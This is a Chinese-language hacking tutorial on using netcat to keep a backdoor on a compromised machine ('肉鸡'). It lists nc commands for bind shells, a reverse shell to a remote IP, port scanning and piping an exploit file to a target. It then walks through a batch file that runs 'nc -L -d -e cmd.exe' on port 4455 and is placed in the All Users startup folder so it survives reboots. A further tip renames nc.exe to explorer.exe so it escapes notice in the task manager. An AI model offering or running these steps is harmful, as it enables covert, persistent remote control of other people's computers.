利用nc构建telnet后门控制

　　nc俗称为网络中的“瑞士军刀”其功能强大，如果在肉鸡上运行“nc.exe–pport–L–d–ecmd.exe”命令就可以构建一个telnet后门，即使关闭了nc.exe程序运行窗口，该后门程序还继续存在。本案例通过一个bat文件来构建一个telnet后门，当系统重新启动后，该后门会继续存在。当然nc还有许多其它用法：
　　(1)连接到REMOTE主机，格式：nc-nvv192.168.x.x80，表示连到192.168.x.x的TCP80端口

　　(2)监听LOCAL主机，格式：nc-l-p80，表示监听本机的TCP80端口

　　(3)扫描远程主机，格式：nc-nvv-w2-z192.168.x.x80-445，表示扫描192.168.x.x的TCP80到TCP445的所有端口

　　(4)REMOTE主机绑定SHELL，格式：nc-l-p5354-t-ec:\winnt\system32\cmd.exe，表示绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

　　(5)REMOTE主机绑定SHELL并反向连接，格式：nc-t-ec:\winnt\system32\cmd.exe192.168.x.x5354讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口。

　　(6)作攻击程序用，格式：

　　type.exec:\exploit.txt|nc-nvv192.168.x.x80

　　nc-nvv192.168.x.x80

　　连接到192.168.x.x的80端口，并在其管道中发送'c:\exploit.txt'的内容

　　(7)作蜜罐用，格式：nc-L-p80讲解：使用'-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止;格式：nc-L-p80>c:\log.txt讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到'c:\log.txt'中，如果把'>'改为'>>'即可以追加日志附：'c:\log.txt'为日志等

　　下面主要介绍如何通过nc批处理命令来构建一个telnet类型的后门：

　　1.编辑一个bat文件。

　　在IP地址为192.168.1.19的计算机上新建一个bat文件，取名为“1.bat”，在其中输入以下内容。
　　@
　　@start
　　@c:\nc.exe–p4455–L–d–ecmd.exe
　　@exit
　　

ecmd.exe

　　图1构建一个bat文件

　　2.将1.bat复制到“Alluser”的启动文件夹。

　　将“1.bat”文件复制到“C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动”文件夹下，2所示。

　　

「开始」菜单

　　图2复制1.bat文件到启动文件夹下

　　3.等待重启后使用telnet连接肉鸡ip。

　　重启计算机后，用户进入计算机后，会执行“1.bat”脚本，会启动nc程序从而开启4455端口。在本地使用命令“telnet192.168.1.194455”连接IP地址192.168.1.19的计算机的4455端口，3所示，可以通过telnet连接肉鸡并在肉鸡上执行各种命令。

　　

4455端口

　　图3使用telnet连接肉鸡4455端口

　　技巧：可以将nc.exe文件重新命名为其他文件，例如explorer.exe等，这样在任务管理器中看到的nc.exe变成了explorer.exe了，不容易被发觉，而nc命令中加入“-L-d”后即使关闭了nc监听窗口，该命令行还继续存在。

　　小结：本案例通过编写bat批处理文件，并将该bat文件放入“C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动”文件夹下，则无论那个用户登陆，都会启动该bat文件，从而保留nc的telnet后门，该后门只要知道端口，通过telnet程序可以直接连接。

文章中说的很不错啊